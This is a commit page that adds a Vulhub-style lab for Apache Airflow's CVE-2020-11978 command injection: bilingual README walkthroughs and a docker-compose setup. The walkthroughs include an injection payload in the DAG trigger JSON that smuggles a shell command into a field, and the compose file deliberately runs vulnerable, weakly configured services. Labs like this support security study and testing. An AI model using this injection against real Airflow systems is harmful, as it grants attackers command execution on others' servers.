first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
airflow/CVE-2020-11978/1.png
Normal file
BIN
airflow/CVE-2020-11978/1.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 118 KiB |
BIN
airflow/CVE-2020-11978/2.png
Normal file
BIN
airflow/CVE-2020-11978/2.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 18 KiB |
BIN
airflow/CVE-2020-11978/3.png
Normal file
BIN
airflow/CVE-2020-11978/3.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 16 KiB |
BIN
airflow/CVE-2020-11978/4.png
Normal file
BIN
airflow/CVE-2020-11978/4.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 11 KiB |
46
airflow/CVE-2020-11978/README.md
Normal file
46
airflow/CVE-2020-11978/README.md
Normal file
@@ -0,0 +1,46 @@
|
||||
# Apache Airflow Command Injection in Example Dag (CVE-2020-11978)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Apache Airflow is an open source, distributed task scheduling framework. In the version prior to 1.10.10, there is a command injection vulnerability in the example DAG `example_trigger_target_dag`, which caused attackers to execute arbitrary commands in the worker process.
|
||||
|
||||
Since there are many components to be started, it may be a bit stuck. Please prepare more than 2G of memory for the use of the virtual machine.
|
||||
|
||||
References:
|
||||
|
||||
- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
|
||||
- <https://github.com/pberba/CVE-2020-11978>
|
||||
|
||||
## Vulnerability Environment
|
||||
|
||||
Execute the following commands to start airflow 1.10.10:
|
||||
|
||||
```bash
|
||||
#Initialize the database
|
||||
docker compose run airflow-init
|
||||
|
||||
#Start service
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
## Exploit
|
||||
|
||||
Visit `http://your-ip:8080` to see the airflow management terminal, and turn on the `example_trigger_target_dag` flag:
|
||||
|
||||

|
||||
|
||||
Click the "triger" button on the right, then input the configuration JSON with the crafted payload `{"message":"'\";touch /tmp/airflow_dag_success;#"}`:
|
||||
|
||||

|
||||
|
||||
Wait a few seconds to see the execution of "success":
|
||||
|
||||

|
||||
|
||||
Go to the CeleryWorker container to see the result, `touch /tmp/airflow_dag_success` has been successfully executed:
|
||||
|
||||
```
|
||||
docker compose exec airflow-worker ls -l /tmp
|
||||
```
|
||||
|
||||

|
46
airflow/CVE-2020-11978/README.zh-cn.md
Normal file
46
airflow/CVE-2020-11978/README.zh-cn.md
Normal file
@@ -0,0 +1,46 @@
|
||||
# Apache Airflow 示例dag中的命令注入(CVE-2020-11978)
|
||||
|
||||
Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker中执行任意命令。
|
||||
|
||||
由于启动的组件比较多,可能会有点卡,运行此环境可能需要准备2G以上的内存。
|
||||
|
||||
参考链接:
|
||||
|
||||
- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
|
||||
- <https://github.com/pberba/CVE-2020-11978>
|
||||
|
||||
## 漏洞环境
|
||||
|
||||
依次执行如下命令启动airflow 1.10.10:
|
||||
|
||||
```bash
|
||||
#初始化数据库
|
||||
docker compose run airflow-init
|
||||
|
||||
#启动服务
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
访问`http://your-ip:8080`进入airflow管理端,将`example_trigger_target_dag`前面的Off改为On:
|
||||
|
||||

|
||||
|
||||
再点击执行按钮,在Configuration JSON中输入:`{"message":"'\";touch /tmp/airflow_dag_success;#"}`,再点`Trigger`执行dag:
|
||||
|
||||

|
||||
|
||||
等几秒可以看到执行成功:
|
||||
|
||||

|
||||
|
||||
到CeleryWorker容器中进行查看:
|
||||
|
||||
```bash
|
||||
docker compose exec airflow-worker ls -l /tmp
|
||||
```
|
||||
|
||||
可以看到`touch /tmp/airflow_dag_success`成功被执行:
|
||||
|
||||

|
90
airflow/CVE-2020-11978/docker-compose.yml
Normal file
90
airflow/CVE-2020-11978/docker-compose.yml
Normal file
@@ -0,0 +1,90 @@
|
||||
version: '3'
|
||||
x-airflow-common:
|
||||
&airflow-common
|
||||
image: vulhub/airflow:1.10.10
|
||||
environment:
|
||||
&airflow-common-env
|
||||
AIRFLOW__CORE__EXECUTOR: CeleryExecutor
|
||||
AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
|
||||
AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
|
||||
AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
|
||||
AIRFLOW__CORE__FERNET_KEY: ''
|
||||
AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
|
||||
AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
|
||||
#AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.basic_auth'
|
||||
AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.default'
|
||||
user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
|
||||
depends_on:
|
||||
redis:
|
||||
condition: service_healthy
|
||||
postgres:
|
||||
condition: service_healthy
|
||||
|
||||
services:
|
||||
postgres:
|
||||
image: postgres:13-alpine
|
||||
environment:
|
||||
POSTGRES_USER: airflow
|
||||
POSTGRES_PASSWORD: airflow
|
||||
POSTGRES_DB: airflow
|
||||
healthcheck:
|
||||
test: ["CMD", "pg_isready", "-U", "airflow"]
|
||||
interval: 5s
|
||||
retries: 5
|
||||
|
||||
redis:
|
||||
image: redis:5-alpine
|
||||
healthcheck:
|
||||
test: ["CMD", "redis-cli", "ping"]
|
||||
interval: 5s
|
||||
timeout: 30s
|
||||
retries: 50
|
||||
|
||||
airflow-webserver:
|
||||
<<: *airflow-common
|
||||
command: webserver
|
||||
ports:
|
||||
- 8080:8080
|
||||
healthcheck:
|
||||
test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
|
||||
interval: 10s
|
||||
timeout: 10s
|
||||
retries: 5
|
||||
|
||||
airflow-scheduler:
|
||||
<<: *airflow-common
|
||||
command: scheduler
|
||||
healthcheck:
|
||||
test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
|
||||
interval: 10s
|
||||
timeout: 10s
|
||||
retries: 5
|
||||
|
||||
airflow-worker:
|
||||
<<: *airflow-common
|
||||
command: worker
|
||||
healthcheck:
|
||||
test:
|
||||
- "CMD-SHELL"
|
||||
- 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
|
||||
interval: 10s
|
||||
timeout: 10s
|
||||
retries: 5
|
||||
|
||||
airflow-init:
|
||||
<<: *airflow-common
|
||||
command: initdb
|
||||
environment:
|
||||
<<: *airflow-common-env
|
||||
_AIRFLOW_DB_UPGRADE: 'true'
|
||||
|
||||
flower:
|
||||
<<: *airflow-common
|
||||
command: flower
|
||||
ports:
|
||||
- 5555:5555
|
||||
healthcheck:
|
||||
test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
|
||||
interval: 10s
|
||||
timeout: 10s
|
||||
retries: 5
|
Reference in New Issue
Block a user